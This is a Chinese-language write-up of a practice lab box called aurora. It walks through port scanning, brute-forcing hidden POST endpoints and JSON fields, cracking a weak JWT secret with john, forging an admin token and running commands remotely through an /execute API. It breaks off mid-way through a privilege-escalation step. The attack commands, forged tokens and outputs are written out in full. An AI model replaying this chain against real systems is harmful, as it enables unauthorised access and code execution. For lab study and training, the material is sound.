aurora渗透笔记

2023-10-21T21:41:00+08:00

1.信息收集1.1.目标发现使用virtualbox导入靶机并打开发现靶机的ip是10.177.246.54image-20230510183540374.png1.2.端口信息扫描使用nmap扫描目标ip的所有端口信息┌──(root㉿kali)-[~] └─# nmap -sS -sV 10.177.246.54 -p- Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 06:41 EDT Nmap scan report for 10.177.246.54 Host is up (0.00052s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 3000/tcp open http Node.js Express framework MAC Address: 08:00:27:73:80:C0 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds发现目标ip开了22和3000端口3000端口是nodejs写的后端2.漏洞发现2.1.查看目标ip的3000端口image-20230510185737546.png显示Cannot GET / 不能使用get用hackbar改成post再次进行访问image-20230510185857836.png还是显示Cannot POST / 不能使用post2.2.网站爆破使用ffuf工具对网站进行爆破┌──(root㉿kali)-[~] └─# ffuf -w /root/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.177.246.54:3000/FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : GET :: URL : http://10.177.246.54:3000/FUZZ :: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ :: Progress: [220560/220560] :: Job [1/1] :: 5882 req/sec :: Duration: [0:00:40] :: Errors: 0 ::发现使用get方式没有爆破出来尝试使用post爆破┌──(root㉿kali)-[~] └─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -X POST -fc 404 -mc all -u http://10.177.246.54:3000/FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : POST :: URL : http://10.177.246.54:3000/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: all :: Filter : Response status: 404 ________________________________________________ [Status: 401, Size: 22, Words: 2, Lines: 1, Duration: 27ms] * FUZZ: login [Status: 400, Size: 29, Words: 6, Lines: 1, Duration: 25ms] * FUZZ: register [Status: 401, Size: 12, Words: 1, Lines: 1, Duration: 7ms] * FUZZ: execute :: Progress: [207643/207643] :: Job [1/1] :: 4761 req/sec :: Duration: [0:00:38] :: Errors: 0 ::扫描到了三个路径使用curl查看这三个路径┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/login Identifiants invalides ┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register The "role" field is not valid ┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/execute Unauthorized 2.3.register字段爆破┌──(root㉿kali)-[~] └─# ffuf -w SecLists-master/Discovery/Web-Content/api/objects.txt -X POST -u http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"FUZZ"}' /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : POST :: URL : http://10.177.246.54:3000/register :: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/api/objects.txt :: Header : Content-Type: application/json :: Data : {"role":"FUZZ"} :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ [Status: 401, Size: 16, Words: 3, Lines: 1, Duration: 30ms] * FUZZ: admin [Status: 500, Size: 32, Words: 5, Lines: 1, Duration: 41ms] * FUZZ: user :: Progress: [3132/3132] :: Job [1/1] :: 1234 req/sec :: Duration: [0:00:02] :: Errors: 0 :: 爆破出admin和user两个字段使用curl测试┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"admin"}' Not authorized ! 访问admin字段返回Not authorized ! 未授权尝试访问user字段┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user"}' Column 'username' cannot be null 返回Column 'username' cannot be null username字段不能空添加username字段测试┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user","username":"user"}' Column 'password' cannot be null 显示Column 'password' cannot be null password字段不能为空添加password字段测试┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user","username":"user","password":"user"}' Registration OK 发现注册成功了2.4.登录尝试使用curl登录┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/login -H "Content-Type: application/json" -d '{"role":"user","username":"user","password":"user"}' {"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M"} 登陆之后返回了一个token3.漏洞利用3.1.尝试使用返回的token执行命令这里我们猜测获取命令的字段为cmd来测试┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M" -H "Content-Type: application/json" -d '{"cmd":"id"}' Not authorized返回Not authorized 未授权猜测只有admin用户才有权限执行命令3.2.修改token为admin用户这里我们用jwt.io这个网站来修改token复制我们的token到这个网站image-20230510201918037.png这里需要秘钥使用john爆破┌──(root㉿kali)-[~] └─# echo eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M > user.hash ┌──(root㉿kali)-[~] └─# john -w=rockyou.txt user.hash Using default input encoding: UTF-8 Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 AVX 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status nopassword (?) 1g 0:00:00:00 DONE (2023-05-10 08:20) 100.0g/s 1228Kp/s 1228Kc/s 1228KC/s total90..hawkeye Use the "--show" option to display all of the cracked passwords reliably Session completed.爆破出秘钥为nopasswordimage-20230510202155574.png将username和role字段都改成admin在下面填入秘钥这样token就修改好了复制这个token 尝试执行命令┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -H "Content-Type: application/json" -d '{"cmd":"id"}' Error

TypeError [ERR_INVALID_ARG_TYPE]: The "file" argument must be of type string. Received undefined
    at validateString (internal/validators.js:120:11)
    at normalizeSpawnArguments (child_process.js:411:3)
    at spawn (child_process.js:547:16)
    at Object.execFile (child_process.js:237:17)
    at exec (child_process.js:158:25)
    at /opt/login-app/app.js:69:3
    at Layer.handle [as handle_request] (/opt/login-app/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/login-app/node_modules/express/lib/router/route.js:144:13)
    at /opt/login-app/app.js:112:5
    at /opt/login-app/node_modules/jsonwebtoken/verify.js:261:12

获取命令的字段错了3.3.爆破命令字段┌──(root㉿kali)-[~] └─# ffuf -w /root/SecLists-master/Discovery/Web-Content/api/objects.txt -u http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -X POST -H "Content-Type: application/json" -d '{"FUZZ":"id"}' -fc 500 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : POST :: URL : http://10.177.246.54:3000/execute :: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/api/objects.txt :: Header : Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk :: Header : Content-Type: application/json :: Data : {"FUZZ":"id"} :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 :: Filter : Response status: 500 ________________________________________________ [Status: 200, Size: 54, Words: 3, Lines: 2, Duration: 89ms] * FUZZ: command :: Progress: [3132/3132] :: Job [1/1] :: 1869 req/sec :: Duration: [0:00:01] :: Errors: 0 ::成功爆破出命令字段command3.4.命令执行使用curl执行命令┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -H "Content-Type: application/json" -d '{"command":"id"}' uid=33(www-data) gid=33(www-data) groups=33(www-data)命令执行成功接下来反弹shellimage-20230510203354001.pngimage-20230510203406123.png3.5.提权至doro用户image-20230510204016654.png发现www用户可以使用doro用户的权限执行/home/doro/tools.py这个脚本image-20230510204136220.png查看这个脚本权限发现只有读的权限查看这个脚本import os import sys def main(): if len(sys.argv) < 2: print_help() return option = sys.argv[1] if option == "--ping": ping() elif option == "--traceroute": traceroute_ip() else: print("Invalid option.") print_help() def print_help(): print("Usage: python3 network_tool.py

Inf0 - 渗透

aurora渗透笔记